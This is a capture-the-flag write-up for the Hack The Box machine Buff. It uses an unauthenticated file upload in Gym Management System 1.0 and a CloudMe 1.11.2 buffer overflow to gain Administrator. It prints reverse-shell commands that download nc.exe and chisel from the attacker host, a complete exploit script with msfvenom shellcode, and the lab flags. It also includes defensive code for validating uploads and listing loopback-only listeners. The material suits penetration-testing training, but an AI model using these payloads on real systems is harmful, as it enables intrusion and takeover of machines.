
Hack The Box Write-Up Buff - 10.10.10.198

Notoriety wasn’t as good as fame, but was heaps better than obscurity.

Neil Gaiman

About Buff

In this post I write up the machine Buff from Hack The Box, an online platform for training your ethical hacking and penetration testing skills.

Buff is an ‘Easy’ rated box. Submitting the user.txt flag raises your points by 10 and submitting the root flag raises them by 20.

Foothold

After the initial port scan with Nmap, we discover one open port, 8080/tcp. Behind this port runs a web server with the Gym Management Software version 1.0. This version suffers from an unauthenticated Remote Code Execution (RCE) vulnerability.

User

After downloading and running the exploit, we obtain a web shell on the machine and can read the user flag.

Root

During enumeration we find the file CloudMe_1112.exe in the Downloads folder. Through searchsploit we find that this version suffers from a Buffer Overflow (BOF) vulnerability. The CloudMe application is running locally on port 8888/tcp. To get the exploit working we need to reverse tunnel this port to our attacker machine; then we can run the exploit to gain a reverse shell as Administrator and root the machine.

Machine Info

Machine Name: Buff
Difficulty: Easy
Points: 20
Release Date: 19 Jul 2020
IP: 10.10.10.198
Creator: egotisticalSW

Recon

Port scan with Nmap

As always we start the box with an Nmap port scan.

nmap -sC -sV -oA ./nmap/10.10.10.198 10.10.10.198

The results of the port scan.

Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-28 17:36 CEST
Nmap scan report for 10.10.10.198
Host is up (0.021s latency).
Not shown: 999 filtered ports
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-title: mrb3n's Bro Hut

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.60 seconds

As the results show, there is only one open port, 8080/tcp. Behind it runs an Apache web server hosting a website with the title mrb3n's Bro Hut.

Enumeration

Enumeration Web Server

We can check the web service on HTTP port 8080 by entering the URL http://10.10.10.198:8080 in Firefox. I landed on the homepage of mrb3n's Bro Hut.

http://10.10.10.198:8080

On the Contact page we see that the website is made with the Gym Management System 1.0.

http://10.10.10.198:8080/contact.php

With searchsploit we can search for known vulnerabilities in this version of the management system. It turns out that this version of the Gym Management software has an Unauthenticated Remote Code Execution vulnerability.

~$ searchsploit Gym
------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                         |  Path
------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Gym Management System 1.0 - Unauthenticated Remote Code Execution                                                                                      | php/webapps/48506.py
WordPress Plugin WPGYM - SQL Injection                                                                                                                 | php/webapps/42801.txt
------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Exploitation

Unauthenticated Remote Code Execution

I copied the exploit 48506.py to my working directory and analyzed the code. Gym Management System version 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file that bypasses the image upload filters.

http://10.10.10.198:8080/upload.php

Let’s run the exploit to get a web shell. If you have problems running this exploit because of the Python version, I solved them with the steps below. You could also port the exploit to Python 3, but that takes longer, so we install pip for Python 2.7 so that we can install the missing Python 2.7 modules.

First, install pip for Python2. To install pip, we need to download the get-pip.py Python script.

~$ wget https://bootstrap.pypa.io/get-pip.py
--2020-08-01 04:39:14--  https://bootstrap.pypa.io/get-pip.py
Resolving bootstrap.pypa.io (bootstrap.pypa.io)… 151.101.0.175, 151.101.64.175, 151.101.128.175, …
Connecting to bootstrap.pypa.io (bootstrap.pypa.io)|151.101.0.175|:443… connected.
HTTP request sent, awaiting response… 200 OK
Length: 1929903 (1.8M) [text/x-python]
Saving to: ‘get-pip.py’
get-pip.py                                      100%[=====================================================================================================>]   1.84M  1.57MB/s    in 1.2s    
2020-08-01 04:39:16 (1.57 MB/s) - ‘get-pip.py’ saved [1929903/1929903]

Then we run this script with Python 2.7. The script detects that it is being run by Python 2.7 and downloads and installs the latest pip version that still supports it.

~$ python2 get-pip.py
 DEPRECATION: Python 2.7 reached the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 is no longer maintained. pip 21.0 will drop support for Python 2.7 in January 2021. More details about Python 2 support in pip can be found at https://pip.pypa.io/en/latest/development/release-process/#python-2-support pip 21.0 will remove support for this functionality.
 Collecting pip<21.0
   Downloading pip-20.3.4-py2.py3-none-any.whl (1.5 MB)
      |████████████████████████████████| 1.5 MB 1.6 MB/s 
 Collecting setuptools<45
   Downloading setuptools-44.1.1-py2.py3-none-any.whl (583 kB)
      |████████████████████████████████| 583 kB 1.7 MB/s 
 Collecting wheel
   Downloading wheel-0.36.2-py2.py3-none-any.whl (35 kB)
 Installing collected packages: pip, setuptools, wheel
 Successfully installed pip-20.3.4 setuptools-44.1.1 wheel-0.36.2

After pip for Python 2.7 is downloaded and installed, we can download and install the missing modules.

~$ python -m pip install requests
~$ python -m pip install colorama

The missing modules are installed. We can now run the exploit.

~$ python 48506.py http://10.10.10.198:8080/
            /\
/vvvvvvvvvvvv \--------------------------------------,
`^^^^^^^^^^^^ /============BOKU====================="
            \/

[+] Successfully connected to webshell.
C:\xampp\htdocs\gym\upload> whoami
�PNG

buff\shaun

C:\xampp\htdocs\gym\upload> type C:\users\shaun\desktop\user.txt
�PNG

c23d5206ed1079f3f7466337bab963d2

After running the exploit we have a web shell and can read the user flag. For me, this is the fastest foothold and user flag ever on Hack The Box. The next phase is privilege escalation.
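
The ‘�PNG’ prefix printed before every command result above indicates that the uploaded file starts with a PNG signature, which is all an upload filter sees if it only checks magic bytes. As an added example (not part of the original post or of Gym Management System), here is a stricter server-side check in Python that walks the PNG chunk structure and verifies each chunk's CRC, so a script with a pasted-on signature is rejected; the sample inputs are constructed inline.

```python
import struct
import zlib
from typing import Tuple

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"


def validate_png(data: bytes) -> Tuple[bool, str]:
    """Return (ok, reason). Instead of trusting the 8-byte signature, walk the
    chunk list: each chunk is a 4-byte big-endian length, a 4-letter ASCII
    type, the data, and a CRC32 over type+data that must match. The first
    chunk must be a 13-byte IHDR and the file must end exactly at IEND."""
    if not data.startswith(PNG_SIGNATURE):
        return False, "missing PNG signature"
    pos = len(PNG_SIGNATURE)
    first = True
    while pos < len(data):
        if len(data) - pos < 12:
            return False, f"truncated chunk header at offset {pos}"
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        if not (ctype.isascii() and ctype.isalpha()):
            return False, f"invalid chunk type {ctype!r} at offset {pos}"
        if first and (ctype != b"IHDR" or length != 13):
            return False, "first chunk is not a 13-byte IHDR"
        first = False
        end = pos + 8 + length
        if end + 4 > len(data):
            return False, f"chunk {ctype.decode()} runs past end of file"
        (crc,) = struct.unpack(">I", data[end:end + 4])
        if crc != zlib.crc32(data[pos + 4:end]):
            return False, f"CRC mismatch in chunk {ctype.decode()}"
        pos = end + 4
        if ctype == b"IEND":
            if pos != len(data):
                return False, "trailing data after IEND"
            return True, "ok"
    return False, "no IEND chunk"


def _chunk(ctype: bytes, payload: bytes) -> bytes:
    crc = zlib.crc32(ctype + payload)
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)


def minimal_png() -> bytes:
    """A genuine 1x1 8-bit grayscale PNG, constructed here for the demo."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    idat = zlib.compress(b"\x00\x00")  # filter byte 0 + one pixel
    return PNG_SIGNATURE + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", idat) + _chunk(b"IEND", b"")


# Constructed stand-in for a disguised upload: a PNG signature glued onto text.
# Placeholder text only, not the exploit's actual file.
DISGUISED_UPLOAD = PNG_SIGNATURE + b"<?php /* placeholder */ ?>"
```

Structural validation is only one layer: a valid PNG can still carry arbitrary text in a chunk, so uploads also belong outside the web root in a location the web server never executes as PHP.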

Privilege Escalation

Reverse shell

I have to exit this web shell so that I have more commands at my disposal. I downloaded the nc.exe to the box and created a reverse shell with PowerShell.

C:\xampp\htdocs\gym\upload> powershell -c "curl 10.10.16.144/nc.exe -o nc.exe"
�PNG

C:\xampp\htdocs\gym\upload> nc.exe 10.10.16.144 4444 -e powershell.exe

The reverse shell is established.

~$ netcat -lvvp 4444
Listening on any address 4444 (krb524)
whoami
Connection from 10.10.10.198:49794
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

whoami
buff\shaun
PS C:\xampp\htdocs\gym\upload>

The machine Buff runs a 64-bit Windows 10 Enterprise operating system.

C:\xampp\htdocs\gym\upload> systeminfo                                                  
�PNG


Host Name:                 BUFF
OS Name:                   Microsoft Windows 10 Enterprise
OS Version:                10.0.17134 N/A Build 17134
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          shaun
Registered Organization:   
Product ID:                00329-10280-00000-AA218
Original Install Date:     16/06/2020, 15:05:58
System Boot Time:          29/07/2020, 14:24:20
System Manufacturer:       VMware, Inc.
System Model:              VMware7,1
System Type:               x64-based PC
...

After a time of searching, I found the file CloudMe_1112.exe in the ‘Downloads’ folder of the user Shaun.

PS C:\Users\shaun\Downloads> ls
ls


    Directory: C:\Users\shaun\Downloads


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----       16/06/2020     16:26       17830824 CloudMe_1112.exe                                                      


PS C:\Users\shaun\Downloads>

We can see that CloudMe is not only downloaded but installed and running, because its processes appear in the process list.

PS C:\> get-process                                                                                                                                                                      
get-process                                                                                                                                                                              
                                                                                                                                                                                         
Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName                                                                                                                    
-------  ------    -----      -----     ------     --  -- -----------                                                                                                                    
    430      24    17700       9032              6908   1 ApplicationFrameHost                                                                                                           
    161      10     1936       2148              7256   1 browser_broker                                                                                                                 
    239      19    25648      29328               316   0 CloudMe                                                                                                                        
    288      36    32832         32              8612   0 CloudMe                                                                                                                        
     45       4     1940       2320       0.00   2876   0 cmd                                                                                                                            
     41       5     2752       3372              4432   0 cmd     

If we check the connections on this machine, we see that it is listening on port 8888/tcp, bound to 127.0.0.1 only.

C:\xampp\htdocs\gym\upload> netstat -anop TCP
�PNG


Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       956
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:5040           0.0.0.0:0              LISTENING       5840
  TCP    0.0.0.0:7680           0.0.0.0:0              LISTENING       8380
  TCP    0.0.0.0:8080           0.0.0.0:0              LISTENING       4512
  TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING       528
  TCP    0.0.0.0:49665          0.0.0.0:0              LISTENING       1092
  TCP    0.0.0.0:49666          0.0.0.0:0              LISTENING       1592
  TCP    0.0.0.0:49667          0.0.0.0:0              LISTENING       2244
  TCP    0.0.0.0:49668          0.0.0.0:0              LISTENING       672
  TCP    0.0.0.0:49669          0.0.0.0:0              LISTENING       688
  TCP    10.10.10.198:139       0.0.0.0:0              LISTENING       4
  TCP    10.10.10.198:8080      10.10.16.101:49614     FIN_WAIT_2      4512
  TCP    10.10.10.198:8080      10.10.16.101:49616     ESTABLISHED     4512
  TCP    127.0.0.1:3306         0.0.0.0:0              LISTENING       8092
  TCP    127.0.0.1:8888         0.0.0.0:0              LISTENING       1704
  TCP    127.0.0.1:54468        127.0.0.1:3306         TIME_WAIT       0
  TCP    127.0.0.1:54470        127.0.0.1:3306         TIME_WAIT       0
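
The Nmap scan at the start showed only 8080/tcp, yet netstat reveals 3306 and 8888 listening on 127.0.0.1. As an added example (not from the original post), the Python below parses `netstat -anop TCP` output and separates loopback-only listeners from exposed ones, using an excerpt of the output above embedded inline; it assumes the Windows netstat column layout shown here.

```python
import re
from typing import Dict, List, NamedTuple

# Excerpt of the `netstat -anop TCP` output from the write-up, embedded here
# as the sample input (constructed for the demo, with most rows trimmed).
NETSTAT_SAMPLE = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       956
  TCP    0.0.0.0:8080           0.0.0.0:0              LISTENING       4512
  TCP    10.10.10.198:139       0.0.0.0:0              LISTENING       4
  TCP    10.10.10.198:8080      10.10.16.101:49616     ESTABLISHED     4512
  TCP    127.0.0.1:3306         0.0.0.0:0              LISTENING       8092
  TCP    127.0.0.1:8888         0.0.0.0:0              LISTENING       1704
  TCP    127.0.0.1:54468        127.0.0.1:3306         TIME_WAIT       0
"""

# Windows netstat TCP row: Proto, Local, Foreign, State, PID. IPv6 locals look
# like [::]:135; the greedy \S+ still splits them at the last colon.
ROW_RE = re.compile(r"^\s*(TCP)\s+(\S+):(\d+)\s+(\S+):(\d+)\s+(\S+)\s+(\d+)\s*$")


class Listener(NamedTuple):
    addr: str
    port: int
    pid: int

    @property
    def loopback_only(self) -> bool:
        """Bound to 127.0.0.0/8 or ::1: not reachable from the network directly."""
        return self.addr.startswith("127.") or self.addr == "[::1]"


def parse_listeners(netstat_text: str) -> List[Listener]:
    """Return every LISTENING TCP socket found in the netstat output."""
    found = []
    for line in netstat_text.splitlines():
        m = ROW_RE.match(line)
        if m and m.group(6) == "LISTENING":
            found.append(Listener(m.group(2), int(m.group(3)), int(m.group(7))))
    return found


def loopback_listeners(netstat_text: str) -> Dict[int, int]:
    """Map port -> owning PID for loopback-only listeners. These never show up
    in an external port scan, but any foothold on the host (or a port forward
    such as the chisel tunnel used later in this write-up) makes them reachable,
    so they need the same patch level and least-privilege review as exposed ones."""
    return {l.port: l.pid for l in parse_listeners(netstat_text) if l.loopback_only}


def exposed_listeners(netstat_text: str) -> Dict[int, int]:
    """Map port -> owning PID for listeners reachable from the network."""
    return {l.port: l.pid for l in parse_listeners(netstat_text) if not l.loopback_only}


if __name__ == "__main__":
    for port, pid in sorted(loopback_listeners(NETSTAT_SAMPLE).items()):
        print(f"loopback-only listener 127.0.0.1:{port} (PID {pid})")
```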

We can check searchsploit for CloudMe version 1.11.2, and it seems that this version has a Buffer Overflow (BOF) vulnerability.

~$ searchsploit cloudme
--------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                           |  Path
--------------------------------------------------------------------------------------------------------- ---------------------------------
CloudMe 1.11.2 - Buffer Overflow (PoC)                                                                   | windows/remote/48389.py
CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASLR)                                                          | windows/local/48499.txt
Cloudme 1.9 - Buffer Overflow (DEP) (Metasploit)                                                         | windows_x86-64/remote/45197.rb
CloudMe Sync 1.10.9 - Buffer Overflow (SEH)(DEP Bypass)                                                  | windows_x86-64/local/45159.py
CloudMe Sync 1.10.9 - Stack-Based Buffer Overflow (Metasploit)                                           | windows/remote/44175.rb
CloudMe Sync 1.11.0 - Local Buffer Overflow                                                              | windows/local/44470.py
CloudMe Sync 1.11.2 - Buffer Overflow + Egghunt                                                          | windows/remote/46218.py
CloudMe Sync 1.11.2 Buffer Overflow - WoW64 (DEP Bypass)                                                 | windows_x86-64/remote/46250.py
CloudMe Sync < 1.11.0 - Buffer Overflow                                                                  | windows/remote/44027.py
CloudMe Sync < 1.11.0 - Buffer Overflow (SEH) (DEP Bypass)                                               | windows_x86-64/remote/44784.py
--------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

I copied the exploit 48389.py to my working directory. After analyzing the payload, I came to the conclusion that we have to build a reverse tunnel, because the exploit connects to 127.0.0.1:8888. I downloaded Chisel 1.6.0 from GitHub: https://github.com/jpillora/chisel/releases/tag/v1.6.0. For my attacking machine I downloaded chisel_1.6.0_linux_amd64.gz and for the Windows machine chisel_1.6.0_windows_amd64.gz. Upload the Windows chisel.exe to the Buff machine and start the chisel server locally.

We can start the chisel server on the attacker machine with a listener on port 5000.

~$ ./chisel_1.6.0_linux_amd64 server -p 5000 --reverse
2021/02/05 05:16:28 server: Reverse tunnelling enabled
2021/02/05 05:16:28 server: Fingerprint 2c:bc:a2:96:16:a4:07:3e:67:d7:72:2b:aa:68:be:cd
2021/02/05 05:16:28 server: Listening on 0.0.0.0:5000…

After downloading chisel to the Buff machine, we can forward port 8888 to our machine.

PS C:\xampp\htdocs\gym\upload> curl 10.10.16.144/chisel.exe -o chisel.exe
curl 10.10.16.144/chisel.exe -o chisel.exe
PS C:\xampp\htdocs\gym\upload> ./chisel.exe client 10.10.16.144:5000 R:8888:127.0.0.1:8888
./chisel.exe client 10.10.16.144:5000 R:8888:127.0.0.1:8888
2021/02/05 10:33:31 client: Connecting to ws://10.10.16.144:5000
2021/02/05 10:33:32 client: Fingerprint 2c:bc:a2:96:16:a4:07:3e:67:d7:72:2b:aa:68:be:cd
2021/02/05 10:33:33 client: Connected (Latency 191.5351ms)

Exploitation with Buffer Overflow

We can now create a reverse shell payload with msfvenom.

~$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.144 LPORT=5555 EXITFUNC=thread -b "\x00\x0d\x0a" -f python -v payload
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of python file: 1869 bytes

I can now place the payload in the exploit script. After modifying the exploit, we are left with this script.

# Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC)
# Date: 2020-04-27
# Exploit Author: Andy Bowden
# Vendor Homepage: https://www.cloudme.com/en
# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Version: CloudMe 1.11.2
# Tested on: Windows 10 x86

# Instructions:
# Start the CloudMe service and run the script.
# Here 127.0.0.1:8888 is the local end of the chisel reverse tunnel
# (R:8888:127.0.0.1:8888), which forwards to CloudMe on the Buff machine.

import socket

target = "127.0.0.1"
port = 8888

padding1   = b"\x90" * 1052            # filler up to the saved return address
EIP        = b"\xB5\x42\xA8\x68"       # 0x68A842B5 -> PUSH ESP, RET
NOPS       = b"\x90" * 30              # NOP sled in front of the shellcode

# Reverse shell generated above with:
# msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.144 LPORT=5555 EXITFUNC=thread -b "\x00\x0d\x0a" -f python -v payload
payload =  b""
payload += b"\xba\xdf\x45\x75\x98\xdb\xc2\xd9\x74\x24\xf4\x58"
payload += b"\x31\xc9\xb1\x52\x31\x50\x12\x83\xc0\x04\x03\x8f"
payload += b"\x4b\x97\x6d\xd3\xbc\xd5\x8e\x2b\x3d\xba\x07\xce"
payload += b"\x0c\xfa\x7c\x9b\x3f\xca\xf7\xc9\xb3\xa1\x5a\xf9"
payload += b"\x40\xc7\x72\x0e\xe0\x62\xa5\x21\xf1\xdf\x95\x20"
payload += b"\x71\x22\xca\x82\x48\xed\x1f\xc3\x8d\x10\xed\x91"
payload += b"\x46\x5e\x40\x05\xe2\x2a\x59\xae\xb8\xbb\xd9\x53"
payload += b"\x08\xbd\xc8\xc2\x02\xe4\xca\xe5\xc7\x9c\x42\xfd"
payload += b"\x04\x98\x1d\x76\xfe\x56\x9c\x5e\xce\x97\x33\x9f"
payload += b"\xfe\x65\x4d\xd8\x39\x96\x38\x10\x3a\x2b\x3b\xe7"
payload += b"\x40\xf7\xce\xf3\xe3\x7c\x68\xdf\x12\x50\xef\x94"
payload += b"\x19\x1d\x7b\xf2\x3d\xa0\xa8\x89\x3a\x29\x4f\x5d"
payload += b"\xcb\x69\x74\x79\x97\x2a\x15\xd8\x7d\x9c\x2a\x3a"
payload += b"\xde\x41\x8f\x31\xf3\x96\xa2\x18\x9c\x5b\x8f\xa2"
payload += b"\x5c\xf4\x98\xd1\x6e\x5b\x33\x7d\xc3\x14\x9d\x7a"
payload += b"\x24\x0f\x59\x14\xdb\xb0\x9a\x3d\x18\xe4\xca\x55"
payload += b"\x89\x85\x80\xa5\x36\x50\x06\xf5\x98\x0b\xe7\xa5"
payload += b"\x58\xfc\x8f\xaf\x56\x23\xaf\xd0\xbc\x4c\x5a\x2b"
payload += b"\x57\x79\x91\x23\x37\x15\xa7\x43\x22\x55\x2e\xa5"
payload += b"\x26\x89\x67\x7e\xdf\x30\x22\xf4\x7e\xbc\xf8\x71"
payload += b"\x40\x36\x0f\x86\x0f\xbf\x7a\x94\xf8\x4f\x31\xc6"
payload += b"\xaf\x50\xef\x6e\x33\xc2\x74\x6e\x3a\xff\x22\x39"
payload += b"\x6b\x31\x3b\xaf\x81\x68\x95\xcd\x5b\xec\xde\x55"
payload += b"\x80\xcd\xe1\x54\x45\x69\xc6\x46\x93\x72\x42\x32"
payload += b"\x4b\x25\x1c\xec\x2d\x9f\xee\x46\xe4\x4c\xb9\x0e"
payload += b"\x71\xbf\x7a\x48\x7e\xea\x0c\xb4\xcf\x43\x49\xcb"
payload += b"\xe0\x03\x5d\xb4\x1c\xb4\xa2\x6f\xa5\xd4\x40\xa5"
payload += b"\xd0\x7c\xdd\x2c\x59\xe1\xde\x9b\x9e\x1c\x5d\x29"
payload += b"\x5f\xdb\x7d\x58\x5a\xa7\x39\xb1\x16\xb8\xaf\xb5"
payload += b"\x85\xb9\xe5"

# Pad the whole buffer to a fixed 1500 bytes
overrun    = b"C" * (1500 - len(padding1 + NOPS + EIP + payload))
buf = padding1 + EIP + NOPS + payload + overrun

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((target, port))
    s.send(buf)
    s.close()
except Exception as e:
    # The original PoC printed sys.exc_value without importing sys, which only
    # works on Python 2; print the caught exception directly instead.
    print(e)

The only thing left to do is make sure netcat is listening on port 5555 and then run the exploit.

~$ python 48389.py

Reverse shell is established and we can own Buff.

~$ nc -lvvp 5555
listening on [any] 5555 …
10.10.10.198: inverse host lookup failed: Unknown host
connect to [10.10.16.144] from (UNKNOWN) [10.10.10.198] 49681
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt
type C:\Users\Administrator\Desktop\root.txt 
9dac8c83a3f6da218fb334836a7bdf1b

C:\Windows\system32>

Thanks for reading this write-up. This write-up and the machine Buff can be used in your preparation for the OSCP exam. I hope to write a blog post in the future about the OSCP and how you can prepare for it. But first, I have to do the OSCP myself 🙂

If you like this write-up, please consider spending a respect point, my HTB profile: https://app.hackthebox.eu/profile/224856.

Happy Hacking :-)

This post is licensed under CC BY 4.0 by the author.